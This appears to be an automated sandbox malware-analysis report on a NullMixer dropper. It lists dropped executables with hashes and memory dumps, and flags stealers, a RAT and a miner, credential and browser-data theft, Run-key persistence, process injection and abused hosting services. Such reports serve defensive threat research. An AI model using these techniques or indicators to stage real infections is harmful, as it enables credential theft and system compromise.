memory/2248-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2248-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2248-53-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2248-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2248-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2644-90-0x0000000001040000-0x0000000001182000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe

MD5 0f3487e49d6f3a5c1846cd9eebc7e3fc
SHA1 17ba797b3d36960790e7b983c432f81ffb9df709
SHA256 fa64075d63724c29bd96e172b3a59c4db6bc80462f8d4408b0676436958a4f1a
SHA512 fe5959d83d8d106675c8ca5ceb424648148ee812ce79f667b25439ef82bf2373fd08342b8d06e40c04e718209ef32a057804c80da0e3a7aac2d88f5ab29df37f

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe

MD5 46e9d76672b9d24ba14ea963574cc6a2
SHA1 caf88d470dc1241aca2b159b26953194a8d59cca
SHA256 2f21e720e8fd2c591fdd52d7267370a2f0894bb4d3ca564392271cc025102ba7
SHA512 3e940ccdc588f0a284ce9c94106161845fb878c42db983b13fffbcac8c5620626ca58d745527309213716889546c4de4777c24f8c706dfe74ece7aa1772022c6

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe

MD5 e2213d70937e476e7a778f1712912131
SHA1 f8f09b6965c83c361210a1b11c8039b7ca9a30b9
SHA256 7312ff88c5eb0eb108cc0f04b91f871f59faed40d28cc5364ff456b0b063c37b
SHA512 cd97ff1cf43462b05461c3c5b3c2efe6aea8645968eae89c1936cf0f2657a05bbdcced863e1b68049c4b4624387f2b1d265257d5ce154053ecd31a032a74611f

memory/1808-135-0x0000000000D30000-0x0000000000E1E000-memory.dmp

memory/1144-131-0x00000000009E0000-0x00000000009E8000-memory.dmp

memory/2128-168-0x00000000010C0000-0x00000000010EC000-memory.dmp

memory/1120-175-0x000000013F4A0000-0x000000013F4B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe

MD5 5c2e28dedae0e088fc1f9b50d7d28c12
SHA1 f521d9d8ae7381e3953ae5cf33b4b1b37f67a193
SHA256 2261a3d740572f9d0ee42faad5b0d405df16506e104bd912e7c7b24d7fddcc5f
SHA512 f6f100508acb77af5b3442673c9d01a6a16cc39521b618eebccd482bf9f50b3991109f82b97e48e8c3cc0221f0be9e164867ba79ac2f2bc4e25cbdb5f7daa15f

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

memory/1880-117-0x0000000000400000-0x0000000002C6D000-memory.dmp

memory/2128-179-0x0000000000150000-0x0000000000156000-memory.dmp

memory/1680-183-0x00000000023E0000-0x00000000024C4000-memory.dmp

memory/2128-182-0x0000000000160000-0x0000000000166000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/2128-181-0x0000000000270000-0x0000000000290000-memory.dmp

memory/2100-194-0x0000000000550000-0x0000000000634000-memory.dmp

memory/2644-213-0x0000000000250000-0x0000000000262000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCFCD.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarD03D.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2248-275-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2248-267-0x0000000000400000-0x0000000000BD8000-memory.dmp

memory/2248-274-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2248-273-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2248-271-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2248-268-0x0000000064940000-0x0000000064959000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/840-288-0x00000000002B0000-0x00000000003B0000-memory.dmp

memory/840-287-0x00000000002B0000-0x00000000003B0000-memory.dmp

memory/840-286-0x00000000002B0000-0x00000000003B0000-memory.dmp

memory/540-304-0x0000000000400000-0x0000000002CC9000-memory.dmp

memory/1120-307-0x00000000007D0000-0x00000000007DE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/2220-311-0x000000013F180000-0x000000013F190000-memory.dmp

memory/2644-312-0x00000000065F0000-0x000000000667C000-memory.dmp

memory/2644-313-0x0000000000960000-0x000000000097E000-memory.dmp

memory/1704-314-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1704-322-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1704-320-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1704-318-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1704-316-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1704-323-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1704-326-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1704-324-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7f6bc2d512d78587dc64b03b7ff5486
SHA1 0260dbe97c32ea43e20ec09a79f993ca4155fefb
SHA256 3d5e10808a148f64e35bf9299f92beb728a87f6660a485358bf2b8afd97bcbf2
SHA512 3bc7e85ebd8d5187a8acedba92d0054664ead0710097c05606386f14196e23bf2298b03105951283b6ddf44fb8ef7c0fb862afd6df49c44d9f9ca6a4afd32de1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2d1371dd5e66add7b25efc3947a57f0d
SHA1 4bffc35c736500f2db0aec3e49e62d3d543412c8
SHA256 e878d2ee639c211fd3411fea73ba25d2210b3bb552f857ffbaaacf366ce37fad
SHA512 19f7de2edf9be2934ba8508427dc6ec6de27e204be5fef8d36da601df521bf9167520c6116f54f20a5837095511612caadd95eaa881931737f59ba834a678545

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 df717b19780d88cd645c95a5a07f603f
SHA1 ef6e24d4191a0359b24052c5967e50ef8b82fcfb
SHA256 fb5f90206a2fbeb50721257f7ecc0c1a0e82510a765a83c1efff85d246294b85
SHA512 c85fbb12e6b27503542b29fb56a6104294ea04fa3ddce7ba5993383d0ab1a9b5056e46199a63fb163fb04d774d1d536b6f769c55c9c1d6956d57b12eb61d4194

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 368f1e117b0d089e593657f3300e0c30
SHA1 2c789dbf1938eafd2efd7574cc57b179ab7125bf
SHA256 1212b58fac330689113245351f2b03680c5bc5cbb84358ec6ca8b1a16f5a0274
SHA512 2a4db11c1ab6c89bed93ce0f2288904430160418c9df820feac31d0b34d5e793eb08b0c9a308d40e700c7ef2c9ec7c7d194a13195395db1818cac32a3cea5dc7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2676e1a5576d8ec68908e3861e4515ab
SHA1 eb0a6655d8b2ff844ac70e1ce5eb73c821e16763
SHA256 d19a606869fb3d9772f2ed7e2da68e1862b8676a6653fb0e2da11714dc4f71ea
SHA512 9eaa62c89d7ad1c207f2561e538b9b727b3bec011fc00237feaf5d8645f51085e347b36e2a31acb2f0d910aaa2275c489763aaa0af7b84b91058ef862a056541

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d7a54a951cd59a6e1622dee1d3a0d79e
SHA1 dd7fb8ac0bb7d8809922fe2f64db124102ad9099
SHA256 2efc4267a4a91d7756ccb2c9d3a61b2ceada9132c3596b9dc144976010da7c8a
SHA512 9bb1baf68bffa0ff97687634de6948141397ef1b3edc5adfb47ced5c29339835cca90b377d45b66cd377482624735d6ec7e4d12d990cc61b33e4b0b8242ef6aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 0e64fddae4ba26ec0a154f40c8951e26
SHA1 0d84a0ba8d4013b8166c32405d5eaf0ba9f50f2b
SHA256 9d2f317389f2c4156e1add71f489c14acfdf45b2a0d7e1dd54eeeaaf5d84142a
SHA512 b00e039aa8dea1a8de066f9e05cbd665ea748e68cde4edbd3012fa7a71243253a45a706a032eb47a126fd5887a1ffcdfaa22f09bb807609f63aab7e7fb813f6c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2a8a3b06e6f4a157111833c1b020e085
SHA1 520668878637127213a1d2a9247d32e387fb425a
SHA256 3f694482baf354d900ccf2914ead878e31c851f74a9e9ce37b09c7b14d3a6710
SHA512 94ef9ad7a3c5e3bc6bf9c30c5d771445804bd2c0b380b8de8b2fe3473499ab6f26dbcc415f183c8f713701857f9ba253168275bd940fea2d288a42d98a9c6869

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fc08e43481a3603b8bb36aa4961c5f7d
SHA1 a4238d6984c1816fecb596cbb7e4b3ba49dcba6c
SHA256 0359032be9cbfdbd07427d534c606c13f4ccebbff4566ac7d58d2af56318a4e5
SHA512 ecd8d1ea1c07bf28a62f6ed118c1399afd43bd6a36d182776436bd12532dd1e705e607bf17394da72ff84ceef2bf7f5a090bc0e67f1ac092f6f61df2c4b74414

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9a00ca000b2322b39bf015e893fd47a9
SHA1 b4a7b6288f792c501a3bca487055d53bef60bb03
SHA256 cf0c478f091727c496c5651ff678e48106372ff058b7fa13eb313a6dfbab28a1
SHA512 5a7178d52d2f2f1a894399bc90774761767c01e13b635676cecd4238315ee2b5550ea0f60161d6b349787c7c54825f1ebdf8be15126a270f74e03e9748ff4938

memory/3068-846-0x000000013FBB0000-0x000000013FBB6000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 686bb34a8be7bd32f2f8bb48211a644a
SHA1 43c393eabe988d705c28d21c9842cba5bbfa8741
SHA256 b821073d5c02e48a769aef7782aaeeb44b75149ddd45265551551e9d632027a9
SHA512 39df26d7dff1f96de6da7b2a8a98e67912fe885aa78b126c4ed853c15577dfa52ab0da1a05f5eae6f389372e2af648bb0f365de3079072912b1b205d6db45401

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 609656137bdb8cebc9b194577ebbba51
SHA1 9800c7232b1f7948724294b572bf68669809a698
SHA256 e86d9a1c7efd308ec5b0134314fcac94338c8704c77269bb79b4cc79656c2db2
SHA512 ea7a7cc113288cf44a1457ab44e52bd8d5abc3a99d4f1b07f5d5fd2130efef5a1e5c161abf5b3729e5e5c6520783091d640ba40ab8f7a79bac770b1741694665

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c23be4d937ffec1091ff043f71d273d3
SHA1 e72c8b9fd3385cc3bcbb3171cfa075a76fb436d7
SHA256 5121ee2d227d45fff826a2dc2650913af9064ad808921ac7e287603569539766
SHA512 29ae6ee40624e328eeec25156e4f8eaeb17ec5e384d8bb733653e594b78fe63b2dd6eb91e3e168ed27da7b3a58faa4d0036be8320981c2f9377050b6c25bf043

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 805218a660dc592c1bbfb29c5d3f9c2a
SHA1 c99352fe5017d2ed8152d9257c69fa2aeac5c403
SHA256 7d968a25d5657da9119c8d2bde3719d7a8d105b112de382e9e4e8fbe1423a1f5
SHA512 c2d9d54e56be6e4db8ea9a0a8f8cb9d9d47615be7635c5e3d67f49bbbc86e36a0c875204d0ad9c91b570c63482a77c61ab505d4da167f6d9b2226aae1f611063

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80dde503e4f1e52ad50d7ee6834cac37
SHA1 088e09c54eb773faca0b288640d67beddba337fb
SHA256 9f17a29d31ff2f1d7b164ae3bf0306ddd02884f5cba6adebd0066aac1c6b62f1
SHA512 fc32f0959f73dd58bfdc82d01cd2ef901c3ff0232e82cb6a0772f4c09e43138b6319430c0c0f19088660338da7d4206887880666b3d7170a66228c1b82ab7c36

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b75d615790f469363dab52806923ef9f
SHA1 5a1dc3e3936f30240888c3f071e5d0d19def7bac
SHA256 273bcfbab5f36b75d2b114a7e1cce335ec6cf78f1609d4b81dfa2fcf5c3e5b00
SHA512 0f1b3400f397622296e1df59bb91821a6b381b37e7efc466cf63c34f3d396bb1ca351f3d27529c5d69b9d7959d176f2d757313857c4949fc4b56de783ebd1050

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fcc78125662c1416ab1ca5fd5c7cfe6a
SHA1 7ff419ea1d4fb5e5c902ba36fb6a137079617b44
SHA256 9e6fdf4282b9610f19e8461ce540598bbe67fa85a403eec799c454b506e63b40
SHA512 d8c346a8bab078db83cd1eee9181d7d99bb3000f32306695cffea9e0b1fb5df996227b22d0c1cd5adba851374bd20f8df6c6a1fb9786188b54de825427ee6cb9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a09fcbb80190428a3b486d3a41a085e1
SHA1 15edf2becd32e46cab7b6cd3ab4ce828ab34708f
SHA256 46a2d43b5f46c8c14300f057defec6f5930240a0cd3d3af16d27f531af5b684d
SHA512 4cec0c21789e5a5d386caffd7cec24004d3abc05ea05c81f10c5c2818a33906e11a59fde0d6cafd2d2901b95d8388ba86ad5b09f80d4f615ba7dc8e77082d639

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0c49194880e0acedd1b80df00d25228e
SHA1 9addcbb9e037f5106b44263fe554bc892becb4ec
SHA256 91cf49ffb0f14703a7b2b2d10f63b072715f2fd88987461fabeddeacd4f25d80
SHA512 48bc89f1927d1a20115310825f5fb33b73177e38da21ad9949ca7fcd2519be88430e1fcefdce1ba11247ac46ae5533298360b799698b0ca8011060c197a1339a

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-25 09:33

Reported

2024-11-25 09:36

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4464 set thread context of 1428 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2828 set thread context of 5188 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
